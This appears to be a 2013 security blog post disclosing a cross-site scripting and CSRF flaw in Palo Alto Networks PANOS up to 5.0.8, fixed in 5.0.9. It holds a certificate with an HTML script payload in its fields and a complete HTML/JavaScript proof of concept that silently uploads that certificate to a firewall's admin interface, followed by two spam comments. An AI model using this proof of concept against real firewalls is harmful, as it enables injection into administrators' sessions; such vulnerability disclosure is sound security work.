Friday, November 22, 2013

Palo Alto Networks PANOS <= 5.0.8 XSS

A couple of bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks.
  • Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject html into the web interface.
  • Various file upload forms used by the firewall do not implement proper CSRF protection. import.certificate.php for example. 


Example of a certificate containing html that will be rendered:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            e5:67:53:d1:e4:2a:71:ec
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Validity
            Not Before: Oct  1 16:28:18 2013 GMT
            Not After : Oct  1 16:28:18 2014 GMT
        Subject: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:b1:d1:b4:9a:58:5e:20:99:15:03:f0:38:e5:dd:
                    11:f1:f1:14:26:3b:aa:6e:6b:c1:c1:28:01:be:d3:
                    93:e8:b5:fb:2e:a8:89:b2:87:56:93:54:60:a6:0c:
                    40:85:31:f8:9d:fd:00:0e:2f:f1:58:e6:a5:8a:0a:
                    67:57:70:06:13:02:2e:68:44:8b:a1:23:b1:bd:27:
                    d4:88:9d:f1:44:76:65:bb:e4:70:b5:fe:9c:21:57:
                    6a:11:df:56:b5:5d:c7:18:b9:b1:9a:81:c9:ae:80:
                    16:9d:11:76:e1:6f:a8:94:dd:01:02:c7:87:7e:cc:
                    b0:06:69:d5:84:79:64:45:d3
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha1WithRSAEncryption
        03:12:b6:12:74:67:8f:ac:e0:5f:02:31:b3:63:10:78:33:9d:
        5e:c0:14:d9:d9:f6:ab:17:45:d3:fa:37:b8:c6:15:7c:24:a4:
        83:61:c6:8c:92:1d:2b:2b:0d:f9:84:79:e7:db:26:07:63:e4:
        9b:3a:3c:5f:a4:31:99:4e:79:30:95:a3:ce:86:9c:09:fa:e0:
        3d:7b:c1:c4:ec:7a:79:b3:9c:7f:e2:36:3e:f2:40:cf:c0:57:
        b0:4c:99:18:76:14:23:30:da:b3:90:2d:cd:af:65:80:bc:db:
        db:3f:9e:44:a1:2e:5e:e2:29:83:ff:29:ec:17:df:8f:7b:55:
        5d:ed


Example html source code to CSRF POST this rogue cert :

  1. PA: <input type="text" id="url" value="https://10.10.10.22">
  2. <input type=button onclick="upload()" value="Upload Certificate"/>
  3. <hr>
  4. <textarea rows=80 cols=80 id=text>
  5. -----------------------------
  6. Content-Disposition: form-data; name="ext-comp-2304"
  7. on
  8. -----------------------------
  9. Content-Disposition: form-data; name="certFile"; filename="server.crt"
  10. Content-Type: application/octet-stream
  11. -----BEGIN CERTIFICATE-----
  12. MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
  13. WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
  14. Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
  15. YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
  16. BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
  17. KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
  18. IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
  19. mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
  20. 5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
  21. gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
  22. AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
  23. eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
  24. FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
  25. -----END CERTIFICATE-----
  26. -----------------------------
  27. Content-Disposition: form-data; name="ext-comp-2306"
  28. Base64 Encoded Certificate (PEM)
  29. -----------------------------
  30. Content-Disposition: form-data; name="keyFile"; filename=""
  31. Content-Type: application/octet-stream
  32. -----------------------------
  33. Content-Disposition: form-data; name="bImportCertificateSubmit"
  34. OK
  35. -----------------------------
  36. Content-Disposition: form-data; name="certFileC"
  37. server.crt
  38. -----------------------------
  39. Content-Disposition: form-data; name="vsysC"
  40. shared
  41. -----------------------------
  42. Content-Disposition: form-data; name="passPhrase"
  43. -----------------------------
  44. Content-Disposition: form-data; name="keyFileC"
  45. -----------------------------
  46. Content-Disposition: form-data; name="certName"
  47. TPOLLET
  48. -----------------------------
  49. Content-Disposition: form-data; name="format"
  50. pem
  51. -----------------------------
  52. Content-Disposition: form-data; name="includekey"
  53. -----------------------------
  54. Content-Disposition: form-data; name="certType"
  55. device
  56. -----------------------------
  57. Content-Disposition: form-data; name="template"
  58. -------------------------------
  59. </textarea>
  60. <script>
  61. function upload() {
  62.   text = document.getElementById('text').value
  63.   host = document.getElementById('url').value;
  64.   url  = host + "/php/device/import.certificate.php";
  65.   xhr  = new XMLHttpRequest();
  66.   xhr.withCredentials = true;
  67.   xhr.open("POST", url, true);
  68.   xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------");
  69.   xhr.send(text);
  70.   alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates' );
  71. }
  72. </script>

These issues have been fixed in PANOS 5.0.9, mentioned in the release notes like this:

57343—Fixed an issue that caused improper handling of imported certificates that contained HTML. 

2 comments:

Unknown said...

Useful Blog...
outsource invoice processing services usa

davidsmith said...

Examsout.com provides authentic IT Certification exams preparation material guaranteed to make you pass in the first attempt. Download instant free demo & begin preparation.
H31-331 braindumps